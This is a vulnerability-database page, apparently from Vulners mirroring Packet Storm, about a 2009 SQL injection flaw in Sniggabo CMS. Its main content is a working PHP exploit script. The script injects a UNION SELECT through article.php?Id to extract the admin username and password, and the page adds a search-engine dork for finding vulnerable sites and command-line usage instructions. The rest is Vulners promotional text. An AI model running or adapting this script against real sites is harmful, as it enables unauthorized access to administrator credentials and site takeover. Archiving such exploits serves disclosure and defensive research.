Lucene search
K

Sniggabo CMS SQL Injection

🗓️ 11 Jun 2009 00:00:00Reported by Lidloses_AugeType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 85 Views

Sniggabo CMS SQL Injection exploit discovered on 11.06.2009, allows unauthorized access to admin pane

Code
`<?php  
print_r('  
  
################################################  
  
Sniggabo CMS - Remote SQL Injection Exploit  
  
Date: 11.06.2009  
Vulnerability discovered by: Lidloses_Auge  
Exploit coded by: Lidloses_Auge  
Homepage: http://www.novusec.com  
Greetz to: -=Player=- , Suicide, enco,  
Palme, GPM, karamble, Free-Hack  
  
Admin Panel: [target]/admin/login.php  
Dork: "powered by Sniggabo CMS" inurl:article.php?id  
Use: php '.$argv[0].' http://www.site.com  
  
################################################  
  
');  
$url = "$argv[1]/article.php?Id=null+union+select+concat(0x313a3a,userid,0x3a3a,password,0x3a3a)+from+users--";  
$src = file_get_contents($url);  
$data = split("::",$src);  
echo "Admin: $data[1]\nPassword: $data[2]\n";  
?>  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Jun 2009 00:00Current
0.5Low risk
Vulners AI Score0.5
85